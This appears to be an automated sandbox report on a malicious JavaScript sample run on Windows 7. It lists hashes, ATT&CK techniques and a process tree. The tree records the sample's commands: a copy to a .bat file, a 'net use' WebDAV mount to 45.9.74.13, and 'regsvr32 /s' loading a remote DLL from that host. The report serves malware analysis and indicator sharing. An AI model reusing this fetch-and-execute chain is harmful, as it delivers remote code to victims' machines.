febf16e318dbb32ba0b6a8320fe7e8d547736db2c8ae2241f05b08f3a6f8f049

Analysis

max time kernel
14s
max time network
19s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
11/07/2024, 05:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

32482319263008431658.js
Size

5KB
MD5

29913b169fda46e6028e3b1e77cbfc7e
SHA1

604590c46e5c82928f64dac242940cdf887356f4
SHA256

febf16e318dbb32ba0b6a8320fe7e8d547736db2c8ae2241f05b08f3a6f8f049
SHA512

e065b9f548d732f63cc3230af719df56b61b18cef657e5b8a5744754bb0e24873b9680ff50ad9956b14d20182fd4b23404b7a1056a37c539d6bd7b72f604523d
SSDEEP

96:kcOFUlzgJBQ0/ZMfPsZMTbcWjURjd33juy413LjU0kuj:ktUlka0WHFbcCelzydn/k4

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2944	regsvr32.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 708 wrote to memory of 2772	708	wscript.exe	29
PID 708 wrote to memory of 2772	708	wscript.exe	29
PID 708 wrote to memory of 2772	708	wscript.exe	29
PID 2772 wrote to memory of 976	2772	cmd.exe	31
PID 2772 wrote to memory of 976	2772	cmd.exe	31
PID 2772 wrote to memory of 976	2772	cmd.exe	31
PID 2772 wrote to memory of 2944	2772	cmd.exe	32
PID 2772 wrote to memory of 2944	2772	cmd.exe	32
PID 2772 wrote to memory of 2944	2772	cmd.exe	32
PID 2772 wrote to memory of 2944	2772	cmd.exe	32
PID 2772 wrote to memory of 2944	2772	cmd.exe	32

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\32482319263008431658.js
1⤵
- Suspicious use of WriteProcessMemory
PID:708
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\32482319263008431658.js" "C:\Users\Admin\\mqvaju.bat" && "C:\Users\Admin\\mqvaju.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:976
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\966.dll
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2944

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\mqvaju.bat

Filesize
5KB

MD5
29913b169fda46e6028e3b1e77cbfc7e

SHA1
604590c46e5c82928f64dac242940cdf887356f4

SHA256
febf16e318dbb32ba0b6a8320fe7e8d547736db2c8ae2241f05b08f3a6f8f049

SHA512
e065b9f548d732f63cc3230af719df56b61b18cef657e5b8a5744754bb0e24873b9680ff50ad9956b14d20182fd4b23404b7a1056a37c539d6bd7b72f604523d

Download Submit